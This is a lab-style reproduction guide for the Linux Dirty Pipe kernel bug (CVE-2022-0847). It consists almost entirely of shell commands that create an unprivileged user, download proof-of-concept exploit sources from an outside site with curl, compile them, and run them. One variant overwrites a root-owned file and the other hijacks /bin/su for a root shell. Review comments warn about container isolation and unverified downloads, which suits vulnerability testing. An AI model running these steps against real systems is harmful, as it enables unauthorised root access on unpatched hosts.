CVE-2022-0847: Linux - Write Anything Exploit
Set up the environment
# Start a disposable Docker container from the pinned ubuntu:focal-20220302
# image and drop into a shell; --rm deletes the container when the shell exits.
# NOTE(review): a container runs on the host's kernel, so CVE-2022-0847 only
# reproduces when the host kernel is vulnerable. Check `uname -r` against your
# distribution's advisory for this CVE. Because the kernel is shared, the
# container is not an isolation boundary for this bug: use a throwaway VM,
# never a shared or production host.
docker run --rm -it ubuntu:focal-20220302 /bin/bash
# Inside the container: work in /tmp, install gcc and curl, and create an
# unprivileged user "foo" whose login shell is bash.
cd /tmp; apt update && apt install -y gcc curl && useradd -s /bin/bash foo
Variant 1: Write Anything
# As root, create a file that only its owner may modify: mode 644 leaves it
# readable by everyone but writable by the owner alone.
echo This is roots file dont touch it! > root_owns_this
chmod 644 root_owns_this
# Switch to the unprivileged "foo" user; everything below runs without root.
su foo
# Download the proof-of-concept source.
# NOTE(review): curl saves whatever the server returns and nothing here checks
# a checksum or signature, so read write_anything.c before building it and
# build it only inside the disposable environment.
curl -o write_anything.c https://dl.packetstormsecurity.net/2203-exploits/write_anything.c
# Compile the proof of concept.
gcc -o write_anything ./write_anything.c
# Before: show the original contents (foo has read access only).
cat ./root_owns_this
# Run the proof of concept against the root-owned file with the arguments
# 1 and FOOOOO (presumably an offset and the replacement data; confirm in the
# downloaded source).
./write_anything ./root_owns_this 1 FOOOOO
# After: changed contents mean this kernel let an unprivileged user alter a
# file it has no write permission on, i.e. the host kernel is unpatched.
# NOTE(review): the file's owner, mode and mtime presumably look unchanged
# afterwards, so compare contents or hashes rather than metadata when
# checking for tampering. Verify on your test system.
cat ./root_owns_this
Variant 2: Root Shell
# Switch to the unprivileged "foo" user (run this from the container's root
# shell created in the setup step).
su foo
# Download the second proof of concept and save it locally as dirty.c.
# NOTE(review): nothing here verifies the download; read dirty.c before
# building it and build it only inside the disposable environment.
curl -o dirty.c https://dl.packetstormsecurity.net/2203-exploits/dirtypipez.c
# Compile the proof of concept.
gcc -o dirty ./dirty.c
# Run it against /bin/su, which is normally a setuid-root binary; per this
# section's title the expected result on a vulnerable kernel is a root shell.
# On a patched kernel the run should fail, which is the outcome to confirm
# after patching.
# NOTE(review): the target is a system binary from the container image, and
# image layers may be shared with other containers on the same host. Treat
# the whole host as tainted after this step and discard the VM instead of
# reusing it.
./dirty /bin/su